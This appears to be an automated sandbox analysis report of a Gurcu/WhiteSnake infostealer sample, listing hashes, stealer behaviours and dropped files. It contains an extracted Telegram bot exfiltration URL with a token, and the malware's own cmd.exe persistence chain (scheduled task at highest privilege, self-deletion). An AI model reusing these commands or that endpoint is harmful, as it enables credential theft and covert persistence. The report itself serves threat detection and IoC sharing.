Resubmissions

10-04-2024 02:52

240410-dcqxlaff2v 10

10-04-2024 02:52

240410-dcqltscc72 10

10-04-2024 02:51

240410-dcm6pscc67 10

10-04-2024 02:51

240410-dcmj6scc66 10

14-10-2023 04:10

231014-erhp7sga6y 10

Analysis

  • max time kernel
    359s
  • max time network
    565s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    10-04-2024 02:51

General

  • Target

    f21559ac7c67d871d4f05.exe

  • Size

    327KB

  • MD5

    78fd6df30f791c7b5f45dca0b4c952a5

  • SHA1

    d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

  • SHA256

    dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

  • SHA512

    abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

  • SSDEEP

    6144:Vc6sWfGY/yODx332tOIXlU1QWZxXAnuHW9bbGDwVdqe1mM:Ps+CXIAuGG8dA

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot5968091729:AAHVag_ncx5c5AIYERGTqv9kr7clJT1_HDU/sendMessage?chat_id=-1001962300376

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe
    "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2540
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2932
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2584
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2644 -s 2412
            4⤵
              PID:2692
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {F6C5B17C-521C-4033-B333-6F62E02C7A36} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2544
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          2⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:1636
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 1636 -s 1796
            3⤵
              PID:1328

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          6ea095d1d0dd1cdf1ecf4a30a7daefb0

          SHA1

          c227ebe380f317648e00025d7f8b9edfd73b4be8

          SHA256

          0fb4d8deac188230953c17f9b455ee0cb554206056453084c8cbd9b417a1f43f

          SHA512

          486d05a2ef26f3caedfb971002da7ae663adb753a0455157a0ec01e00fc2acd766f2392fa241986620ad706b2f19792d052cc4f4f9ffc5a861b2eb01aaeb58b2

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          e2bb4fb31f766e474e201c74a84c585a

          SHA1

          deaf3530bff3dc03852d7d58807c70a65b425ffd

          SHA256

          ae8068e1e70ee61bb44c2d8ff3839af1536ce23a23c440994bc21050b5f92f70

          SHA512

          2aa3c954da680b274eb10f246d78f6b929d2b64f652771ff15f6c6ac2f3fb61240172109883ea695807bacc778a9aa77120a4e9a1bf6ddf1ac17e2337c39adc2

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          f833d2dd1aa139434e2fcdae07d80415

          SHA1

          142071c4853c38a8c51c2ed2772010f0f9fd4f58

          SHA256

          330493c48f315eb95ccd2b6068f2cd83e6a0df8febf9f1867e6cc5ab8b13f1f4

          SHA512

          1d7284e7a49e0aa75b4a123fa2db8c37b99a2d49151d5b2281c83c84ee2470ade805ba21e0f401af3dadbbcf9a4811af189c5394cacb39faba42fd02d0800c6d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          1d41f0d7c175a348d0d1dd7b20e5f89f

          SHA1

          bc548163118376d9ef0b14feff2b46101cd8d250

          SHA256

          de10fbe2a08eab378077ff08f016964b53773e598a8ee1ac1fa4e931ccf46b10

          SHA512

          9ed99b794f76046bf8937fdd3a3779f7d80fdaa3e713c4b46ace1516357695d2ba48b44e3495903ab5d5027a5020dd5363fa4c761e92835d901f5a2e441f9596

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          6cf1607f895e45cb511183b1f710248c

          SHA1

          7ff469f2a6d9d2f75627ac0d64e5b092b8019085

          SHA256

          914d0f04375718fe3133b1a1bde4e5e83010b6a447be19f027ee1ce2c390a19a

          SHA512

          e655669fd15aacda714f7f153ee920ccb8f00f8712f72943218a34a5b2ffa82c1ed37eb83c2e49889292a40fd95f97971b0a4ad1b634742b8d9e3ad3953bfb39

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          b594cd145941cfa110bc23a0600a2316

          SHA1

          36ce36e107b11d98d5de3a0009294259a06bd4fe

          SHA256

          5eec6fc9f46639cb77093752b71b4ffca23bd0e444c964c2563f3aa7a2e1ae69

          SHA512

          760d150592e78b44a3357d1d01faaf9719f06bbe6a02f7af115fc51ee4d8fcf8264313289a87bb6274ea3bf44b7a41dc85db7d4608322eea735b5dc701342cd0

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          46c71fc6ebc920f538fbdaaac436f167

          SHA1

          551e156fa227963c1afb09f39be6af34a12ac5c7

          SHA256

          c217342dbbd9d51ca3bbe2b5633a45c9fed77e1868db5e66e0548eee2c046789

          SHA512

          6ec717fc27a0270e108987134b00d78fdd5f72cb4fbc07159ddbc7df9558286d03d2262479923e0e323b95100d6f4bf389ed679255edef100dc7825afe40d8ad

        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe

          Filesize

          327KB

          MD5

          78fd6df30f791c7b5f45dca0b4c952a5

          SHA1

          d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

          SHA256

          dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

          SHA512

          abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

        • C:\Users\Admin\AppData\Local\Temp\Tar2082.tmp

          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        • C:\Users\Admin\AppData\Local\z1jp774dks\port.dat

          Filesize

          4B

          MD5

          88bfcf02e7f554f9e9ea350b699bc6a7

          SHA1

          f9fc4123eeaa0b57b9ec04bb5dc952acaf672f45

          SHA256

          04e97796ac4d1ffe851398d3a25afad5f62916ef5ac22f6f10e83192dc15e8c3

          SHA512

          6fd9b434440b4772a894c8bb29ed31cbd6e4b8436dedf1fe2330e4ea129c8fa82e9d1d0ea90cfe063bd6d6edaa839d235f4284c5ce97670d091da453296c0122

        • memory/1636-303-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB

        • memory/1636-280-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB

        • memory/2392-1-0x000007FEF5C60000-0x000007FEF664C000-memory.dmp

          Filesize

          9.9MB

        • memory/2392-5-0x000007FEF5C60000-0x000007FEF664C000-memory.dmp

          Filesize

          9.9MB

        • memory/2392-2-0x000000001B490000-0x000000001B510000-memory.dmp

          Filesize

          512KB

        • memory/2392-0-0x0000000000AC0000-0x0000000000B18000-memory.dmp

          Filesize

          352KB

        • memory/2644-11-0x000000001B120000-0x000000001B1A0000-memory.dmp

          Filesize

          512KB

        • memory/2644-277-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB

        • memory/2644-278-0x000000001B120000-0x000000001B1A0000-memory.dmp

          Filesize

          512KB

        • memory/2644-9-0x0000000000080000-0x00000000000D8000-memory.dmp

          Filesize

          352KB

        • memory/2644-10-0x000007FEF5270000-0x000007FEF5C5C000-memory.dmp

          Filesize

          9.9MB